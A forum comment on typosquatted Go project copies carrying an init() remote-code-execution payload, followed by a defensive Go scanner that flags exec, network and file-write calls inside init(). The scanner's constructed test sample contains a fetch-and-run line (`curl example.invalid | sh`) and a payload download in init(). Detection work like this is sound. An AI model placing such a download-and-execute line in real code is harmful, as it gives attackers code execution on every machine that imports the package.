by raggi
1420 days ago
From what I can see, he wrote the tweet after organically finding one of these via Google and then searching and finding that there were many, many more. It's absolutely true that the wording is wrong, but I think it's reasonable to accept a jumped-the-gun explanation rather than a clickbait one. The presence of large volumes of project copies on typosquats and synonym squats is still a problem: they'll still get indexed by tools, and then the tools boost their page rank, and eventually some make it to users. Given that the Go init payload contains an RCE and not just a data collection, there is still something of note there. Yes, it's not 35k compromised projects, but it is a broad deployment of malicious code.
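As an added example, not code from the comment above or from the incident it discusses: a small Go scanner that parses a source file with go/ast and flags calls inside init() functions to process-execution, network or file-writing APIs, the kind of import-time payload the comment describes. The list of suspicious calls and the two embedded sample files are constructed for this example and are assumptions, not artifacts from any real repository.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// Finding records one suspicious call found inside an init() body.
type Finding struct {
	File string
	Line int
	Call string
}

// suspiciousCalls lists package-qualified calls that have no business in a
// library's init(): process execution, raw network access, file writes.
// This list is illustrative (an assumption of this example), not exhaustive.
var suspiciousCalls = map[string]bool{
	"exec.Command":        true,
	"exec.CommandContext": true,
	"syscall.Exec":        true,
	"net.Dial":            true,
	"http.Get":            true,
	"http.Post":           true,
	"os.WriteFile":        true,
	"ioutil.WriteFile":    true,
}

// ScanInitFuncs parses one Go source file given as text and returns every
// call reached syntactically inside a top-level init() whose selector
// (pkg.Func) matches suspiciousCalls. It is a syntax-only check: no type
// information, so aliased imports and indirect calls are not resolved.
func ScanInitFuncs(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var findings []Finding
	for _, decl := range f.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		// Only plain top-level init() functions run on import.
		if !ok || fn.Recv != nil || fn.Name.Name != "init" || fn.Body == nil {
			continue
		}
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			call, ok := n.(*ast.CallExpr)
			if !ok {
				return true
			}
			sel, ok := call.Fun.(*ast.SelectorExpr)
			if !ok {
				return true
			}
			pkg, ok := sel.X.(*ast.Ident) // pkg.Func form only
			if !ok {
				return true
			}
			name := pkg.Name + "." + sel.Sel.Name
			if suspiciousCalls[name] {
				findings = append(findings, Finding{
					File: filename,
					Line: fset.Position(call.Pos()).Line,
					Call: name,
				})
			}
			return true
		})
	}
	return findings, nil
}

// constructedMalicious is a constructed sample, not code from any real repo:
// a copied project whose init() fetches and executes a command on import.
const constructedMalicious = `package main

import (
	"net/http"
	"os/exec"
)

func init() {
	resp, _ := http.Get("http://example.invalid/payload.sh")
	_ = resp
	_ = exec.Command("sh", "-c", "curl example.invalid | sh").Start()
}

func main() {}
`

// constructedBenign is a constructed sample whose init() only registers a flag.
const constructedBenign = `package main

import "flag"

var verbose bool

func init() {
	flag.BoolVar(&verbose, "v", false, "verbose")
}

func main() {}
`

func main() {
	samples := map[string]string{"malicious.go": constructedMalicious, "benign.go": constructedBenign}
	for name, src := range samples {
		findings, err := ScanInitFuncs(name, src)
		if err != nil {
			fmt.Println(name, "parse error:", err)
			continue
		}
		for _, f := range findings {
			fmt.Printf("%s:%d suspicious call in init(): %s\n", f.File, f.Line, f.Call)
		}
	}
}
```

Because the check is purely syntactic, it is a triage filter for a large set of cloned repositories rather than a verdict: an init() that calls a helper function which in turn runs exec.Command, or that imports os/exec under an alias, is missed, while a legitimate tool whose init() shells out is flagged. Pairing it with go/types or with a dynamic check (build in a sandbox and watch for network or process activity at import time) closes those gaps.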